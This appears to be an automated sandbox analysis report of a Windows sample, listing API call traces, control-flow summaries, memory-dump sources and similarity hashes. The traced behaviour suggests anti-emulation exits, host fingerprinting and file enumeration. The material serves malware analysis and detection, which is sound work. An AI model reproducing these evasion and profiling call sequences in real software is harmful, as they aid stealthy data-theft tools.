                                  • GetProcAddress.KERNEL32(74DD0000,011CCFF8), ref: 002D6AAA
                                  • GetProcAddress.KERNEL32(74DD0000,011CD0D0), ref: 002D6AC2
                                  • GetProcAddress.KERNEL32(74DD0000,011B5970), ref: 002D6ADB
                                  • GetProcAddress.KERNEL32(74DD0000,011B5BD0), ref: 002D6AF3
                                  • LoadLibraryA.KERNEL32(011CD070,002D051F), ref: 002D6B05
                                  • LoadLibraryA.KERNEL32(011CD148), ref: 002D6B16
                                  • LoadLibraryA.KERNEL32(011CD160), ref: 002D6B28
                                  • LoadLibraryA.KERNEL32(011CD1C0), ref: 002D6B3A
                                  • LoadLibraryA.KERNEL32(011CD1D8), ref: 002D6B4B
                                  • LoadLibraryA.KERNEL32(011CD010), ref: 002D6B5D
                                  • LoadLibraryA.KERNEL32(011CCF20), ref: 002D6B6F
                                  • LoadLibraryA.KERNEL32(011CD1F0), ref: 002D6B80
                                  • GetProcAddress.KERNEL32(75290000,011B5B90), ref: 002D6B9C
                                  • GetProcAddress.KERNEL32(75290000,011CD280), ref: 002D6BB4
                                  • GetProcAddress.KERNEL32(75290000,011C90A8), ref: 002D6BCD
                                  • GetProcAddress.KERNEL32(75290000,011CD298), ref: 002D6BE5
                                  • GetProcAddress.KERNEL32(75290000,011B5E50), ref: 002D6BFD
                                  • GetProcAddress.KERNEL32(6FC70000,011BB9C8), ref: 002D6C1D
                                  • GetProcAddress.KERNEL32(6FC70000,011B5C90), ref: 002D6C35
                                  • GetProcAddress.KERNEL32(6FC70000,011BB900), ref: 002D6C4E
                                  • GetProcAddress.KERNEL32(6FC70000,011CD490), ref: 002D6C66
                                  • GetProcAddress.KERNEL32(6FC70000,011CD430), ref: 002D6C7E
                                  • GetProcAddress.KERNEL32(6FC70000,011B5C10), ref: 002D6C97
                                  • GetProcAddress.KERNEL32(6FC70000,011B5CB0), ref: 002D6CAF
                                  • GetProcAddress.KERNEL32(6FC70000,011CD3A0), ref: 002D6CC7
                                  • GetProcAddress.KERNEL32(752C0000,011B5BF0), ref: 002D6CE3
                                  • GetProcAddress.KERNEL32(752C0000,011B5D50), ref: 002D6CFB
                                  • GetProcAddress.KERNEL32(752C0000,011CD2C8), ref: 002D6D14
                                  • GetProcAddress.KERNEL32(752C0000,011CD448), ref: 002D6D2C
                                  • GetProcAddress.KERNEL32(752C0000,011B5E10), ref: 002D6D44
                                  • GetProcAddress.KERNEL32(74EC0000,011BB748), ref: 002D6D64
                                  • GetProcAddress.KERNEL32(74EC0000,011BBA40), ref: 002D6D7C
                                  • GetProcAddress.KERNEL32(74EC0000,011CD358), ref: 002D6D95
                                  • GetProcAddress.KERNEL32(74EC0000,011B5E30), ref: 002D6DAD
                                  • GetProcAddress.KERNEL32(74EC0000,011B5AB0), ref: 002D6DC5
                                  • GetProcAddress.KERNEL32(74EC0000,011BB950), ref: 002D6DDE
                                  • GetProcAddress.KERNEL32(75BD0000,011CD2B0), ref: 002D6DFE
                                  • GetProcAddress.KERNEL32(75BD0000,011B5D70), ref: 002D6E16
                                  • GetProcAddress.KERNEL32(75BD0000,011C8FF8), ref: 002D6E2F
                                  • GetProcAddress.KERNEL32(75BD0000,011CD2E0), ref: 002D6E47
                                  • GetProcAddress.KERNEL32(75BD0000,011CD400), ref: 002D6E5F
                                  • GetProcAddress.KERNEL32(75BD0000,011B5D90), ref: 002D6E78
                                  • GetProcAddress.KERNEL32(75BD0000,011B5AD0), ref: 002D6E90
                                  • GetProcAddress.KERNEL32(75BD0000,011CD208), ref: 002D6EA8
                                  • GetProcAddress.KERNEL32(75BD0000,011CD3E8), ref: 002D6EC1
                                  • GetProcAddress.KERNEL32(75BD0000,CreateDesktopA), ref: 002D6ED7
                                  • GetProcAddress.KERNEL32(75BD0000,OpenDesktopA), ref: 002D6EEE
                                  • GetProcAddress.KERNEL32(75BD0000,CloseDesktop), ref: 002D6F05
                                  • GetProcAddress.KERNEL32(75A70000,011B5AF0), ref: 002D6F21
                                  • GetProcAddress.KERNEL32(75A70000,011CD310), ref: 002D6F39
                                  • GetProcAddress.KERNEL32(75A70000,011CD220), ref: 002D6F52
                                  • GetProcAddress.KERNEL32(75A70000,011CD340), ref: 002D6F6A
                                  • GetProcAddress.KERNEL32(75A70000,011CD2F8), ref: 002D6F82
                                  • GetProcAddress.KERNEL32(75450000,011B5B50), ref: 002D6F9E
                                  • GetProcAddress.KERNEL32(75450000,011B5D30), ref: 002D6FB6
                                  • GetProcAddress.KERNEL32(75DA0000,011B5C70), ref: 002D6FD2
                                  • GetProcAddress.KERNEL32(75DA0000,011CD328), ref: 002D6FEA
                                  • GetProcAddress.KERNEL32(6F070000,011B5B70), ref: 002D700A
                                  • GetProcAddress.KERNEL32(6F070000,011B5CD0), ref: 002D7022
                                  • GetProcAddress.KERNEL32(6F070000,011B5CF0), ref: 002D703B
                                  • GetProcAddress.KERNEL32(6F070000,011CD3B8), ref: 002D7053
                                  • GetProcAddress.KERNEL32(6F070000,011B5D10), ref: 002D706B
                                  • GetProcAddress.KERNEL32(6F070000,011B5BB0), ref: 002D7084
                                  • GetProcAddress.KERNEL32(6F070000,011B5C30), ref: 002D709C
                                  • GetProcAddress.KERNEL32(6F070000,011B5B10), ref: 002D70B4
                                  • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 002D70CB
                                  • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 002D70E2
                                  • GetProcAddress.KERNEL32(75AF0000,011CD4D8), ref: 002D70FE
                                  • GetProcAddress.KERNEL32(75AF0000,011C9058), ref: 002D7116
                                  • GetProcAddress.KERNEL32(75AF0000,011CD4A8), ref: 002D712F
                                  • GetProcAddress.KERNEL32(75AF0000,011CD460), ref: 002D7147
                                  • GetProcAddress.KERNEL32(75D90000,011B5DB0), ref: 002D7163
                                  • GetProcAddress.KERNEL32(6CE20000,011CD418), ref: 002D717F
                                  • GetProcAddress.KERNEL32(6CE20000,011B5B30), ref: 002D7197
                                  • GetProcAddress.KERNEL32(6CE20000,011CD268), ref: 002D71B0
                                  • GetProcAddress.KERNEL32(6CE20000,011CD370), ref: 002D71C8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$LibraryLoad
                                  • String ID: CloseDesktop$CreateDesktopA$HttpQueryInfoA$InternetSetOptionA$OpenDesktopA
                                  • API String ID: 2238633743-3468015613
                                  • Opcode ID: 52ecbf54fd86e461aabc5fd91a2e8beceb5a33e66e81fe75a67db6a77e2e6585
                                  • Instruction ID: 667fcae9e0536bbe77a2b8e504c1703e435e8364f1818cbe750af4b9517e84a6
                                  • Opcode Fuzzy Hash: 52ecbf54fd86e461aabc5fd91a2e8beceb5a33e66e81fe75a67db6a77e2e6585
                                  • Instruction Fuzzy Hash: BF6252F56102819FDB54DF65EDC8A2637B9F7882013508A3DE959CB3A3DB34AD00DB68
                                  APIs
                                  • lstrlen.KERNEL32(002DCFEC), ref: 002CF1D5
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002CF1F1
                                  • lstrlen.KERNEL32(002DCFEC), ref: 002CF1FC
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002CF215
                                  • lstrlen.KERNEL32(002DCFEC), ref: 002CF220
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002CF239
                                  • lstrcpy.KERNEL32(00000000,002E4FA0), ref: 002CF25E
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002CF28C
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002CF2C0
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002CF2F0
                                  • lstrlen.KERNEL32(011B5A10), ref: 002CF315
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen
                                  • String ID: ERROR
                                  • API String ID: 367037083-2861137601
                                  • Opcode ID: fe98199e6a84d92dfaeb3f780691d3c4481584baff7bcb1eb5d5097888a899ac
                                  • Instruction ID: ea62654d55faf229c2224cfc9546d6c86e9ecf77599863a96417f056f8b356ac
                                  • Opcode Fuzzy Hash: fe98199e6a84d92dfaeb3f780691d3c4481584baff7bcb1eb5d5097888a899ac
                                  • Instruction Fuzzy Hash: 23A27E709212428FDB64DF64DA88F5AB7B6AF44340F29817DE849DB3A2DB31DC61CB50
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002D0013
                                  • lstrlen.KERNEL32(002DCFEC), ref: 002D00BD
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002D00E1
                                  • lstrlen.KERNEL32(002DCFEC), ref: 002D00EC
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002D0110
                                  • lstrlen.KERNEL32(002DCFEC), ref: 002D011B
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002D013F
                                  • lstrlen.KERNEL32(002DCFEC), ref: 002D015A
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002D0189
                                  • lstrlen.KERNEL32(002DCFEC), ref: 002D0194
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002D01C3
                                  • lstrlen.KERNEL32(002DCFEC), ref: 002D01CE
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002D0206
                                  • lstrlen.KERNEL32(002DCFEC), ref: 002D0250
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002D0288
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002D059B
                                  • lstrlen.KERNEL32(011B5870), ref: 002D05AB
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002D05D7
                                  • lstrcat.KERNEL32(00000000,?), ref: 002D05E3
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002D060E
                                  • lstrlen.KERNEL32(011CE478), ref: 002D0625
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002D064C
                                  • lstrcat.KERNEL32(00000000,?), ref: 002D0658
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002D0681
                                  • lstrlen.KERNEL32(011B57D0), ref: 002D0698
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002D06C9
                                  • lstrcat.KERNEL32(00000000,?), ref: 002D06D5
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002D0706
                                  • lstrcpy.KERNEL32(00000000,011C8F68), ref: 002D074B
                                    • Part of subcall function 002B1530: lstrcpy.KERNEL32(00000000,?), ref: 002B1557
                                    • Part of subcall function 002B1530: lstrcpy.KERNEL32(00000000,?), ref: 002B1579
                                    • Part of subcall function 002B1530: lstrcpy.KERNEL32(00000000,?), ref: 002B159B
                                    • Part of subcall function 002B1530: lstrcpy.KERNEL32(00000000,?), ref: 002B15FF
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002D077F
                                  • lstrcpy.KERNEL32(00000000,011CE490), ref: 002D07E7
                                  • lstrcpy.KERNEL32(00000000,011C9238), ref: 002D0858
                                  • lstrcpy.KERNEL32(00000000,fplugins), ref: 002D08CF
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002D0928
                                  • lstrcpy.KERNEL32(00000000,011C9248), ref: 002D09F8
                                    • Part of subcall function 002B24E0: lstrcpy.KERNEL32(00000000,?), ref: 002B2528
                                    • Part of subcall function 002B24E0: lstrcpy.KERNEL32(00000000,?), ref: 002B254E
                                    • Part of subcall function 002B24E0: lstrcpy.KERNEL32(00000000,?), ref: 002B2577
                                  • lstrcpy.KERNEL32(00000000,011C9298), ref: 002D0ACE
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002D0B81
                                  • lstrcpy.KERNEL32(00000000,011C9298), ref: 002D0D58
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$lstrcat
                                  • String ID: fplugins
                                  • API String ID: 2500673778-38756186
                                  • Opcode ID: 535f104f5b432d1ea8843f6d6937115c6878a52d4865d0b91e6a226d0076c7c9
                                  • Instruction ID: 5064141f1faa5db1803fb9885aff83f65aa58bdc8d4f1754d60b868b3e4c1d48
                                  • Opcode Fuzzy Hash: 535f104f5b432d1ea8843f6d6937115c6878a52d4865d0b91e6a226d0076c7c9
                                  • Instruction Fuzzy Hash: BEE228709253428FD724DF29C488BAAB7E1BF88314F58856ED48D8B362DB319C65CF52
                                  APIs
                                  • lstrlen.KERNEL32(011B5A10), ref: 002CF315
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002CF3A3
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002CF3C7
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002CF47B
                                  • lstrcpy.KERNEL32(00000000,011B5A10), ref: 002CF4BB
                                  • lstrcpy.KERNEL32(00000000,011C8F38), ref: 002CF4EA
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002CF59E
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 002CF61C
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002CF64C
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002CF69A
                                  • StrCmpCA.SHLWAPI(?,ERROR), ref: 002CF718
                                  • lstrlen.KERNEL32(011C8F78), ref: 002CF746
                                  • lstrcpy.KERNEL32(00000000,011C8F78), ref: 002CF771
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002CF793
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002CF7E4
                                  • StrCmpCA.SHLWAPI(?,ERROR), ref: 002CFA32
                                  • lstrlen.KERNEL32(011C8F28), ref: 002CFA60
                                  • lstrcpy.KERNEL32(00000000,011C8F28), ref: 002CFA8B
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002CFAAD
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002CFAFE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen
                                  • String ID: ERROR
                                  • API String ID: 367037083-2861137601

                                  Control-flow Graph
                                  (rendered graph; node and edge data and the executed/not-executed colouring are not reproduced) Function 2c8ca0-2c8eef: calls StrCmpCA, ExitProcess, lstrlen, lstrcpy and the internal functions 2b2a20 and 2b2930.
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitProcess
                                  • String ID: block
                                  • API String ID: 621844428-2199623458

                                  Control-flow Graph
                                  (rendered graph; node and edge data and the executed/not-executed colouring are not reproduced) Function 2d2740-2d2872: calls GetWindowsDirectoryA, GetVolumeInformationA, GetProcessHeap, RtlAllocateHeap, wsprintfA and the internal function 2d71e0.
                                  APIs
                                  • GetWindowsDirectoryA.KERNEL32(00000000,00000104,00000000,00000000,00000000), ref: 002D277B
                                  • GetVolumeInformationA.KERNEL32(?,00000000,00000000,002C93B6,00000000,00000000,00000000,00000000), ref: 002D27AC
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 002D280F
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 002D2816
                                  • wsprintfA.USER32 ref: 002D283B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowswsprintf
                                  • String ID: :\$C
                                  • API String ID: 2572753744-3309953409

                                  Control-flow Graph
                                  (rendered graph; node and edge data and the executed/not-executed colouring are not reproduced) Function 2b4bc0-2b4c48: calls ??2@YAPAXI@Z (3 times), lstrlen, InternetCrackUrlA and the internal function 2b2a20.
                                  APIs
                                  • ??2@YAPAXI@Z.MSVCRT(00000800,?), ref: 002B4BF7
                                  • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 002B4C01
                                  • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 002B4C0B
                                  • lstrlen.KERNEL32(?,00000000,?), ref: 002B4C1F
                                  • InternetCrackUrlA.WININET(?,00000000), ref: 002B4C27
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ??2@$CrackInternetlstrlen
                                  • String ID: <
                                  • API String ID: 1683549937-4251816714

                                  Control-flow Graph
                                  (rendered graph; node and edge data and the executed/not-executed colouring are not reproduced) Function 2b1030-2b10b6: calls GetCurrentProcess, VirtualAllocExNuma, ExitProcess, VirtualAlloc and VirtualFree.
                                  APIs
                                  • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 002B1046
                                  • VirtualAllocExNuma.KERNEL32(00000000), ref: 002B104D
                                  • ExitProcess.KERNEL32 ref: 002B1058
                                  • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 002B106C
                                  • VirtualFree.KERNEL32(00000000,17C841C0,00008000), ref: 002B10AB
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Virtual$AllocProcess$CurrentExitFreeNuma
                                  • String ID:
                                  • API String ID: 3477276466-0

                                  Control-flow Graph
                                  (rendered graph; node and edge data and the executed/not-executed colouring are not reproduced) Function 2cee90-2cefa0: calls StrCmpCA, lstrcpy and the internal functions 2b2930, 2b6c40 and 2b2a20 (the last one 10 times in a row).
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002CEEC3
                                  • StrCmpCA.SHLWAPI(?,ERROR), ref: 002CEEDE
                                  • lstrcpy.KERNEL32(00000000,ERROR), ref: 002CEF3F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy
                                  • String ID: ERROR
                                  • API String ID: 3722407311-2861137601

                                  Control-flow Graph
                                  (rendered graph; node and edge data and the executed/not-executed colouring are not reproduced) Function 2b10c0-2b111d: calls GlobalMemoryStatusEx and ExitProcess.
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitGlobalMemoryProcessStatus
                                  • String ID: @
                                  • API String ID: 803317263-2766056989

                                  Control-flow Graph (graph image not recoverable): function 2c8c88-2c8eef, calling StrCmpCA, ExitProcess, lstrlen and lstrcpy, with subcalls to 2b2a20 and 2b2930; the ExitProcess path is reached from the first StrCmpCA at 2c8c88-2c8cc4.
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: ExitProcess
                                  • String ID: block
                                  • API String ID: 621844428-2199623458
                                  • Opcode ID: 6e8d705228d1b36886878d72f8e818b65e759852dc9ce98ec536efeba7fd54fd
                                  • Instruction ID: 562a5cadb6cf458ae966f83da9cf99bb134d50eaff98d207acb7780b8e834e52
                                  • Opcode Fuzzy Hash: 6e8d705228d1b36886878d72f8e818b65e759852dc9ce98ec536efeba7fd54fd
                                  • Instruction Fuzzy Hash: E1E0D86010038AEBD7106BB6D885D467B68EF45700F44C13DBA009B152EE34AD04C759

                                  Control-flow Graph (graph image not recoverable): function 2d2ad0-2d2b59, calling GetProcessHeap, RtlAllocateHeap and GetComputerNameA, branching to 2d2b44-2d2b59 or 2d2b24-2d2b36.
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 002D2AFF
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 002D2B06
                                  • GetComputerNameA.KERNEL32(00000000,00000104), ref: 002D2B1A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateComputerNameProcess
                                  • String ID:
                                  • API String ID: 1664310425-0
                                  • Opcode ID: 2d0de507371f2f307014e4deb298abace0b73eeb2346de99de96ab9b6df954bd
                                  • Instruction ID: f3846f7a43a0ee1dc7e3df8f6704ab97c13857c4e7d1aa8462fc4b1ad354ff54
                                  • Opcode Fuzzy Hash: 2d0de507371f2f307014e4deb298abace0b73eeb2346de99de96ab9b6df954bd
                                  • Instruction Fuzzy Hash: D801AD72A44248ABC710DF99EC85BAEF7B8FB45B21F40026BF919E3780D7741D0486A5
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002C23D4
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C23F7
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002C2402
                                  • lstrlen.KERNEL32(\*.*), ref: 002C240D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C242A
                                  • lstrcat.KERNEL32(00000000,\*.*), ref: 002C2436
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C246A
                                  • FindFirstFileA.KERNEL32(00000000,?), ref: 002C2486
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                  • String ID: \*.*
                                  • API String ID: 2567437900-1173974218
                                  • Opcode ID: fa1ce0d08fa4b99fc4ed678715d2096d35eb6417266d5b3e706cb3162fc158c1
                                  • Instruction ID: 6f103893a3c40366864adeda9709fb5c1d7bd301603fd408b82b9de04b910cff
                                  • Opcode Fuzzy Hash: fa1ce0d08fa4b99fc4ed678715d2096d35eb6417266d5b3e706cb3162fc158c1
                                  • Instruction Fuzzy Hash: 3CA28B31921757DBDB21EF64CD88FAEB7B9AF04740F144228B849A7252DF34DD298B90
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002B16E2
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002B1719
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002B176C
                                  • lstrcat.KERNEL32(00000000), ref: 002B1776
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002B17A2
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002B17EF
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002B17F9
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002B1825
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002B1875
                                  • lstrcat.KERNEL32(00000000), ref: 002B187F
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002B18AB
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002B18F3
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002B18FE
                                  • lstrlen.KERNEL32(002E1794), ref: 002B1909
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002B1929
                                  • lstrcat.KERNEL32(00000000,002E1794), ref: 002B1935
